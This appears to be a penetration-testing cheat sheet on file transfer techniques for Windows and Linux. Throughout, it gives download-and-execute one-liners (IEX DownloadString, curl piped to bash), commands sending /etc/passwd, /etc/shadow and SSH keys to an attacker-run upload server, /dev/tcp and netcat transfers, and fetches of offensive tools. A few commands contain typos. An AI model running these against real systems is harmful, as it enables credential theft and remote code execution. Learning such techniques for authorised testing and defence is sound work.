ποΈFile Transfers
Windows Methods Downloading
PowerShell Base64
Linux
Check MD5 Hash:
md5sum id_rsa
Encode the file in base64:
cat id_rsa | base64 -w 0;echooutput:
LS0tl1.........Z1
PowerShell
Decode:
[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("<BASE64_STRING>")
Check MD5 hash:
id_rsa -Alorithm md5
PowerShell Web Downloads
HTTP and HTTPS outbound traffic is usually allowed through a firewall.
In PowerShell, we can use the System.Net.WebClient command to download a file.
Method
Description
Returns the data from a resource without blocking the calling thread.
Downloads data from a resource and returns a Byte array.
Downloads data from a resource and returns a Byte array without blocking the calling thread.
Downloads data from a resource to a local file.
Downloads data from a resource to a local file without blocking the calling thread.
Downloads a String from a resource and returns a String.
Downloads a String from a resource without blocking the calling thread.
File Download
(New-Object Net.WebClient).DownloadFile('<File-URL>','<Output-File-Name>')
(New-Object Net.WebClient).DownloadFileAsync('<File-URL>','<Output-File-Name>')Download String (Fileless)
IEX (New-Object Net.WebClient).DownloadString('<STRING>')Web Request
Invoke-WebRequest <FILE.ps1> -OutFile PowerView.ps1Other Types
Common Errors
if Internet Explorer has not been configured we can bypass this using the -UseBasicParsing
If we get an SSL/TLS certificate is not trusted we can bypass it with:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}SMB Download
First, create an SMB server using Impacket
sudo impacket-smbserver share -smb2support /tmp/share
Window later version blocks guest access
To authenticate add the params:
-user <USER>-password <PASS>
To download a file
copy \\<IP>\share\file.exe
Mount a SMB server
net use n: \\<IP>\share /user:<USER> <PASS>
FTP Download
We start by configuring a FTP server
sudo pip3 install pyftpdlibsudo python3 -m pyftpdlib --port 21
Transfer files using PowerShell
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\Users\Public\<FILE>')
If we don't have an interactive shell then we can make a FTP command file
echo open <IP> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
open 192.168.49.128
Log in with USER and PASS first.
USER anonymous
GET file.txt
byeUploads
Encoding File using PowerShell
[Convert]::ToBase64String((Get-Content -path "C:\<FILE>" -Encoding byte))Decode using Linux
echo <STRING> | base64 -d > hostPowerShell Web Uploads
Doesn't have a built-in function for uploads.
We can use Invoke-WebRequest
First, we need to set up the web server
pip3 install uploadserver
python3 -m uploadserver
PowerShell to upload a file to the Python Upload Server
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts
[+] File Uploaded: C:\Windows\System32\drivers\etc\hosts
[+] FileHash: 5E7241D66FD77E9E8EA866B6278B2373PowerShell Base64 Upload
PS script to upload a file to Python
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64Linux Methods
Encode a file with base64
cat id_rsa | base64 -w 0;echo
Then decode
echo -n '<STRING>' | base64 -d > id_rsaDownloading Files
Wget
wget http://<URL>/file.ext -O /tmp/file.ext
Curl
curl -o /tmp/file.sh http://<URL>/path/file.sh
Bash
If other tools are not available we can use Bash
Connect to a target Web server
exec 3<>/dev/tcp/<IP>/<PORT>
HTTP GET
echo -e "GET /script.sh HTTP/1.1\n\n">&3
Print Response
cat <&3
Fileless Downloads
Gets executed immediately with Bash in this case
curl http:<IP>/script.sh | bash
wget -q0 http://<URL>/path/file.py | python3
SSH
scp <user>@<IP>:/root/filex.txt .
Web Uploads
Upload server for HTTPS
sudo python3 -m pip install --user uploadserver Create a self-signed certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' Start Server
sudo python3 -m uploadserver 43 --server-certificate /root/server.pemUpload Multiple Files
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecurSSH Upload
scp /etc/passwd <USER>@<IP>:/home/passwdTransfer with Code
One Liners
With Python, we can use the -c option to run commands
Python2 Download
python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'Python3 Download
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'Uploading:
python3 -m uploadserver
python3 -c 'import requests;requests.post("http:<IP>:8000/upload",files={"files":open("/etc/passwd","rb")})'PHP
With PHP we can use the -r option to run commands
Downloading with file_get_contents
file_get_contentsphp -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'Download with fopen
fopenphp -r 'const BUFFER = 1024; $fremote =
fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'Download a file and pipe to Bash
php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bashRuby Download
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'Perl Download
perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'JavaScript
// wget.js
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));Run in Windows and Download
cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1VBScript
# wget.vbs
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile WScript.Arguments.Item(1), 2
end withDownload a file in Windows
cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1Miscellaneous Methods
Netcat
Listening and Downloading
nc -l -p 4444 > file.exe
Sending a file
nc -q 0 10.10.120.10 8000 < file.exe
Sending file as Input to Netcat
sudo nc -l -p 443 -q 0 < file.exe
Receive File
nc <IP> 443 > file.txt
Ncat
Listening and Downloading
ncat -l -p 4444 --recv-only > file.exe
Sending a File
ncat --send-only 192.168.49.128 8000 < file.exe
Sending a file as Input to Ncat
sudo ncat -l -p 443 --send-only < file.exe
Receive File
cat < /dev/tcp/<IP>/443 > file.exe
RDP
Mounting a Linux Folder using xfreerdp
xfreerdp /v:10.10.10.132 /d:DC/u:user/p:'password' /drive:linux,/home/user/File Encryption
Windows
One of the easiest methods is using this PowerShell script
PS > Import Module .\Invoke-AESEncryption.ps1
PS > Invoke-AESEncryption -Mode Encrypt -Key "password" -Path .\sensitive-info.txt
Linux
Using OpenSSL with the aes256 encryption
Encryption:
openssl enc -aes256 -iter 100000 -pkbdf2 -in /etc/passwd -out passwd.enc
enter aes-256-cbc encryption password:
Verifying - enter aes-256-cbc encryption password:Decryption:
openssl enc -d -aes256 -iter 100000 -pkbdf2 -in passwd.enc -out passwd
enter aes-256-cbc decryption password:Useful Tools
Uploading files and grabbing them without any setup
Last updated
Was this helpful?